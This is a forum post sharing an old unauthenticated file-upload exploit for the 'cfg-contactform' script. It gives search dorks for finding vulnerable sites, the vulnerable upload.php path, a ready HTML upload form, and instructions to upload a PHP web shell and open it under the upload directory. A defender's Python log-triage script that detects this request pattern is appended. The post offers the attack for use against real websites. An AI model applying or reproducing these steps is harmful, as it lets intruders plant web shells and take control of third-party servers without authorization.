cfg-contactform Vulnerability File Upload

by Nue Bhandell - 05-27-2016 at 12:02 PM
Posted: 05-27-2016, 12:02 PM (This post was last modified: 05-27-2016, 12:15 PM by Nue Bhandell.)
Just for fun, sharing an old exploit; maybe it still works.
By the way, I'm also trying out the BACKBOX INDONESIA WEB SHELL V1.0 (BASED ON INDOXPLOIT SHELL) shell from Kang hightech.

Let's get straight to it. Play with me Baby  :heart:

Dork:
"/cfg-contactform-1/" 
"/cfg-contactform-2/"

# Here the exploit depends on which contact form number it is, bro:
/[path]/cfg-contactform-1/inc/upload.php

Vulnerable? {"filename":" -001."} *it depends on the dork, though

[Image: 7b43e7787e784a25a581c140acc7a1dd.png]

CSRF Upload:
<form enctype="multipart/form-data"
action="target" method="post">
<input type="text" name="folder" value="./" /><br />
Please choose a file: <input name="Filedata" type="file" /><br />
<input type="submit" value="upload" />
</form>

Then just upload your file/shell.
If it succeeds, the name of your shell appears.

[Image: 8f90e2f76d0b402fa904af6623ff68fa.png]

Shell access: /[path]/cfg-contactform-1/upload/namashell.php

[Image: 50ec314b0dc94aef8937f16135eca205.png]

For the PHP code, here

Hope this is useful, guys; sorry if the tutorial is lame  :D
Don't forget to visit my blog too, haha: TKJ Cyber Art

~ Bye


SOURCE
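For defenders, the request pattern described in the post above (a POST to `inc/upload.php` followed by a request for a script under `upload/`) can be looked for in web server access logs. The following is an added example, not part of the original post; the "combined" log format, the function name `triage` and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample lines in Apache/Nginx "combined" format (assumed format).
SAMPLE_LOG = """\
203.0.113.7 - - [27/May/2016:12:20:01 +0700] "POST /site/cfg-contactform-1/inc/upload.php HTTP/1.1" 200 31 "-" "Mozilla/5.0"
203.0.113.7 - - [27/May/2016:12:20:09 +0700] "GET /site/cfg-contactform-1/upload/x-001.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.4 - - [27/May/2016:12:25:44 +0700] "POST /site/cfg-contactform-2/inc/upload.php HTTP/1.1" 200 29 "-" "Mozilla/5.0"
198.51.100.4 - - [27/May/2016:12:26:02 +0700] "GET /site/cfg-contactform-2/upload/cv-001.pdf HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
192.0.2.10 - - [27/May/2016:12:30:00 +0700] "GET /site/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# client IP, method, URL and status from one combined-format line
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# The upload endpoint named in the post, for any contact form number.
UPLOAD = re.compile(r'/cfg-contactform-\d+/inc/upload\.php$', re.I)
# Server-side script extensions that should never be served from upload/.
SCRIPT = re.compile(r'/cfg-contactform-\d+/upload/[^/]+\.(?:php\d?|phtml|phar)$', re.I)

def triage(log_text):
    """Return {client_ip: [(kind, path, status), ...]} for suspicious requests."""
    uploaded = set()               # clients that have POSTed to upload.php
    findings = defaultdict(list)
    for raw in log_text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue               # skip lines that are not in the assumed format
        ip, method, url, status = m.groups()
        path = url.split("?", 1)[0]    # ignore the query string
        if method == "POST" and UPLOAD.search(path):
            uploaded.add(ip)
            findings[ip].append(("upload_post", path, status))
        elif SCRIPT.search(path):
            # Highest signal: the same client fetches a script it just uploaded.
            kind = "script_after_upload" if ip in uploaded else "script_in_upload_dir"
            findings[ip].append((kind, path, status))
    return dict(findings)

if __name__ == "__main__":
    for ip, hits in triage(SAMPLE_LOG).items():
        for kind, path, status in hits:
            print(ip, kind, status, path)
```

An `upload_post` finding on its own is expected for legitimate attachments; the `script_*` findings are the ones to investigate, and serving the `upload/` directory with script execution disabled removes the impact.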